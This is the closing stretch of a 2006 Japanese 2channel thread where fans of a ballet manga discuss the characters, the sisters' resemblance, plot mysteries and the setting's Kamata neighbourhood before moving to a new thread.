924 :花と名無しさん:2006/07/11(火) 00:48:04 ID:???0
>>923
変な男がまとわりついて、余計鬱。
自殺が早まる。

925 :花と名無しさん:2006/07/11(火) 00:48:36 ID:???O
千花と六花、年子なんだよね。ママン頑張ったんだなぁ。
さっさと生み上げておきたかったのかな。

926 :花と名無しさん:2006/07/11(火) 00:49:33 ID:???0
バレエを教える上での効率が良いというのもあると思う。>>925

927 :花と名無しさん:2006/07/11(火) 00:49:49 ID:???0
>>925
はやく仕事に復帰したかったから、
計画的に年子だろうという気がする

928 :花と名無しさん:2006/07/11(火) 00:51:13 ID:???0
長女が生まれたとき、まさか中学まで育って自殺で亡くすとは思わなかっただろうなあ、千恵子も。

929 :花と名無しさん:2006/07/11(火) 00:51:55 ID:???O
千花、美智子先生に会わせてたらどうなったかな。
余計絶望したかな。美智子先生は、踊るどころか車椅子でも自殺してないし。
まぁ一度頂点を極めてからの挫折だけど。スタートで挫折した千花、やっぱり可哀相。

930 :花と名無しさん:2006/07/11(火) 00:53:54 ID:???O
一人っ子でも良かったわけじゃない?
単に利夫が我慢でき(ry

931 :花と名無しさん:2006/07/11(火) 00:54:13 ID:???O
それにしても、うまい具合に年子で女の子ができたよね。千花は14歳で自殺しちゃったけど。

932 :花と名無しさん:2006/07/11(火) 00:54:57 ID:???0
>>929
醜い生き方だなと思っただろうという気が・・・
千花ちゃんみたいな子がボランティアって、
絶対あってないと思う。

933 :花と名無しさん:2006/07/11(火) 00:54:59 ID:???0
>>930
いや、公務員と完璧主義の妻の夫婦だよ。
明るい厳格な家族計画実行してるに決まってんじゃん。

934 :花と名無しさん:2006/07/11(火) 00:55:48 ID:???0
男女は問わなかったと思う。
男でもバレエやらせるだけの話。

935 :花と名無しさん:2006/07/11(火) 00:56:33 ID:???O
連続妊娠出産は大変そうだ…。
バレエで体力あるから無問題だったのかな。

936 :花と名無しさん:2006/07/11(火) 00:56:46 ID:???0
>>921
どこが?
見たまんまなら二人は全然違うし、
ちょいきつめの美人と目の大きい可愛い子は全然似てないと思うんだけど。

937 :花と名無しさん:2006/07/11(火) 00:57:38 ID:???0
けっこう軽いお産だったりして。
経腟分娩の場合、難産だと酸素不足で子供がバカになりやすい。
軽ければ利口というもんでもないけど。

938 :花と名無しさん:2006/07/11(火) 00:58:33 ID:???O
男児のバレエ人口少ないから、もし生まれたのが男児でも、それはそれで楽しみだったかもね。

利夫似じゃなければ…。

939 :花と名無しさん:2006/07/11(火) 00:59:20 ID:???0
>936
マンガだけでも普通に似て見えるけど?
ふとみ、桜子、ユキ、チカと並べて、マンガ読んでない人にどれが姉妹でしょう
っていったら、多分当たるよ。

940 :花と名無しさん:2006/07/11(火) 01:00:23 ID:???0
>そっくり
作者としては、六花が千花に間違えられるというのが
重要だったんだろうと思うな。
具体的に目鼻立ちがどうこうじゃなくて。

941 :花と名無しさん:2006/07/11(火) 01:01:03 ID:???O
確かに千恵子さんはお産軽そう。w

942 :花と名無しさん:2006/07/11(火) 01:01:07 ID:???0
俺、幼稚園の時に、従姉の女の子と一緒に少しバレエ習ってたんだよね。
運動神経が悪くて、全然ダメだったんだけど、教室で男子は一人だったから
すごく先生が可愛がってくれてさ。やめるとき、ひどく残念がってた。
また気が向いたら来てくださいって、なんども母親に言ってたらしい。
自分語り、すまん。

943 :花と名無しさん:2006/07/11(火) 01:01:25 ID:???0
>>939
比較対象が悪すぎるw

944 :花と名無しさん:2006/07/11(火) 01:02:43 ID:???O
921じゃないけど似てるとおもうよ。
あの漫画のキャラの中じゃ輪郭、顔のパーツの配置が近い同士でしょ。
ギシ先生は描き分けがうまいから他のキャラは全然違う顔の骨格してる。
何より目が似てる。
まゆげは正反対だけど目のラインが目頭から目尻に上がっていく角度が一緒。

945 :花と名無しさん:2006/07/11(火) 01:03:14 ID:???0
チカユキのあのパッチリおめめの遺伝子はどこから来たんだ?

946 :花と名無しさん:2006/07/11(火) 01:03:38 ID:???O
>>932
でも、何か困った人がいたらスマートに助けたりしそうな感じもある
>チカ

947 :花と名無しさん:2006/07/11(火) 01:04:02 ID:???O
利夫似で、バレエテクニックの凄い息子。
でも「公務員になるのが夢」とか。

948 :花と名無しさん:2006/07/11(火) 01:04:19 ID:T3LMJP660
教えて下さい。
ユキがチカの代わりに出たクララの舞台で
上手と下手を間違えて教えたのは誰だったんですか?

949 :花と名無しさん:2006/07/11(火) 01:04:40 ID:???0
>>945
パパは眼鏡とると目がパッチリの美形なんだよ

950 :花と名無しさん:2006/07/11(火) 01:05:23 ID:???0
>>940
いやだからさ、絵でも似てるけど、別人に描いてあるよちゃんと。
その上で、>>872
>千花はちょいきつめの美人で、六花は目の大きい可愛い子って感じだろと
これはそのとおりなんじゃないの? 初対面で間違えられるくらい似ていて、
二人の違いはと言えば上のとおりってコトだと思うけど違うのか?
六花が「チカちゃんは美人」とか言うシーンもあった。

951 :花と名無しさん:2006/07/11(火) 01:06:05 ID:???O
>>948
ゴッシーじゃなかった?

952 :花と名無しさん:2006/07/11(火) 01:06:28 ID:???0
>>949
苦しいよw

953 :花と名無しさん:2006/07/11(火) 01:06:37 ID:???O
>>917
コミクス読み返して探したけどなかった。
あった気がしたんだけどなー。

もしかしたら九巻収録分かな?
それか脳内補完ですw

954 :花と名無しさん:2006/07/11(火) 01:06:50 ID:???0
そろそろ新スレだね

955 :花と名無しさん:2006/07/11(火) 01:07:53 ID:???0
>950
次スレよろ

956 :花と名無しさん:2006/07/11(火) 01:08:20 ID:???0
遠目だと区別付かない程度の似方なんでしょ。
年子だと成長すると本当に双子みたいになっちゃう姉妹もいるよ。

957 :花と名無しさん:2006/07/11(火) 01:08:22 ID:???0
>>953
57話。
「今日一番のショックは六花ちゃんだ!」の回。

958 :花と名無しさん:2006/07/11(火) 01:08:31 ID:???0
950だけど、俺はタタネエ。EDっす。
他の人、よろ。

959 :花と名無しさん:2006/07/11(火) 01:09:08 ID:???0
もう、二人並んで写真を撮ることもないんだよなあ。

960 :花と名無しさん:2006/07/11(火) 01:11:36 ID:???0
>>950
>六花が「チカちゃんは美人」とか言うシーンもあった。
すまん。どこにあったっけ。
「化粧が綺麗」「踊りが綺麗」といった類ではないことを祈る。
六花は確か空美にも言っているので信用できん。

961 :花と名無しさん:2006/07/11(火) 01:12:38 ID:???0
>>929

わかった!
ここまでは美智子の物語を紡ぐための伏線なのじゃ

962 :花と名無しさん:2006/07/11(火) 01:12:47 ID:???0
新スレ立て、試してみようかな

963 :花と名無しさん:2006/07/11(火) 01:13:17 ID:???0
わりい。寝まする。>>960
どこだったか忘れた。有ったような気がするんだけど。
コミックス調べる元気無し。
もしも、脳内だったスマネエ。

964 :花と名無しさん:2006/07/11(火) 01:14:12 ID:???0
>>961
実は本作品の主人公は美智子だったわけですか!

965 :花と名無しさん:2006/07/11(火) 01:14:58 ID:???0
一日一スレ。

966 :花と名無しさん:2006/07/11(火) 01:15:08 ID:T3LMJP660
ゴッシーは反対側にいたから、違うと思うのですが、
その前に暗闇から聞こえた声の主が誰かずっと気になってます。

967 :花と名無しさん:2006/07/11(火) 01:15:56 ID:???0
>>966
それは、この作品の謎ということになってるよね。

968 :花と名無しさん:2006/07/11(火) 01:17:10 ID:???O
>>957
おー、ありがとう。
っ事は1月号か2月号かな。
ちょうどこないだ5月号以前を捨てちゃったんだよね。
だから間が抜けてるの。九巻に入るかな。

969 :花と名無しさん:2006/07/11(火) 01:17:52 ID:???0
>>966
今まで出た説では、悪意無く勘違いした関係者、という説がわりと有力かな。

970 :花と名無しさん:2006/07/11(火) 01:19:03 ID:???0
主人公はゆきじゃないんだ、美智子先生なわけ?

971 :花と名無しさん:2006/07/11(火) 01:22:36 ID:???0
年取った六花が最後に発狂する話だったら嫌だな。

972 :花と名無しさん:2006/07/11(火) 01:22:39 ID:???0
ワックスべたべたの犯人も謎

973 :962:2006/07/11(火) 01:22:47 ID:???0
新スレ↓

http://comic6.2ch.net/test/read.cgi/gcomic/1152548327/l50

過去スレはダラダラ貼らない方が好評らしいので止めました。

974 :花と名無しさん:2006/07/11(火) 01:23:24 ID:???0
美智子先生の過去がいつか語られる日が来るのだろうか
大地主の娘で家にレッスン場があって、若い頃はプリマしてて
ロシアバレエをたたき込まれている。ドイツやアメリカにも行っていた事がある。
35歳で止まっている。35歳頃何かがあったのか。

975 :花と名無しさん:2006/07/11(火) 01:24:10 ID:???0
>962
乙。完璧なスレ立て。

976 :花と名無しさん:2006/07/11(火) 01:24:55 ID:???O
>>969
だね
結果的にユキの武勇伝wを作る演出みたいになってるし

977 :花と名無しさん:2006/07/11(火) 01:25:27 ID:???0
美智子先生と英一


バカ姉弟を思い出しちった

978 :花と名無しさん:2006/07/11(火) 01:26:14 ID:???0
>962乙
>950は好きなことだけ言い散らかして寝てしまってひどすぎる…

979 :花と名無しさん:2006/07/11(火) 01:26:23 ID:???0
ユキのグランジュテの場面はダビンチを持つ手が震えたよ
褒めすぎ?

980 :花と名無しさん:2006/07/11(火) 01:28:59 ID:???0
>>973
お疲れ様でした。

981 :花と名無しさん:2006/07/11(火) 01:33:35 ID:???0
>>978
ワロタ。

982 :花と名無しさん:2006/07/11(火) 01:37:12 ID:???0
>>908
蒲田から越してきたって担任の紹介。

美智子先生の家(レッスン場だけだけど)が近いし、
生活保護もらう関係か何かジャマイカ

983 :花と名無しさん:2006/07/11(火) 01:44:05 ID:???O
>>982
ありがとう
蒲田…
そんなに知らないけど、あの一家にあってそうな感じ

984 :花と名無しさん:2006/07/11(火) 01:50:53 ID:???0
確かになんとなく蒲田っぽいw

985 :花と名無しさん:2006/07/11(火) 01:58:20 ID:???0
>>917
自分で言ってたよ。

986 :花と名無しさん:2006/07/11(火) 02:00:19 ID:???0
>>982
蒲田の、当然海側だろうなぁ。陸側にも微妙な地域(クミの職場になりそうな)はあるが…。

987 :花と名無しさん:2006/07/11(火) 02:01:02 ID:???0
蒲田って今は完全に下町っぽい感じなんだけど(DQNのすくつとも言える)、
昔は結構落ち着いた住宅街でもあったんだよね。
だから美智子先生設定もあり得るかと。


988 :花と名無しさん:2006/07/11(火) 02:01:33 ID:???0
あのオヤジはアル中だけ?

蒲田だったら競艇とか、ギャンブルにもはまってそうだけど。

989 :花と名無しさん:2006/07/11(火) 02:02:44 ID:???0
んー、そういや美智子先生ちはどこだろう?

クミのアパートから電車で数駅みたいだけど。

990 :花と名無しさん:2006/07/11(火) 02:15:52 ID:???O


991 :花と名無しさん:2006/07/11(火) 02:22:31 ID:???0
蒲田行進曲しか知らない

992 :花と名無しさん:2006/07/11(火) 02:27:23 ID:???0
>>989
大森駅、山王側はいかが。
山の方はいまだにお屋敷町ですが、駅近は庶民的な商店街になってる。


993 :花と名無しさん:2006/07/11(火) 02:36:20 ID:???0
そうくつ?

銀ちゃん〜

994 :花と名無しさん:2006/07/11(火) 03:12:50 ID:???O
>>993
つ「2ちゃん初心者のためのヘルスケア講座」

995 :花と名無しさん:2006/07/11(火) 04:35:52 ID:???O


996 :花と名無しさん:2006/07/11(火) 04:37:42 ID:???O


997 :花と名無しさん:2006/07/11(火) 04:38:28 ID:???O


998 :花と名無しさん:2006/07/11(火) 04:44:50 ID:fSPH+uJgO
1000ならユキ留学

999 :花と名無しさん:2006/07/11(火) 04:47:00 ID:fSPH+uJgO
1000ならタクト急成長

1000 :花と名無しさん:2006/07/11(火) 04:54:29 ID:???0
1000ならクミ再登場

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

220 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)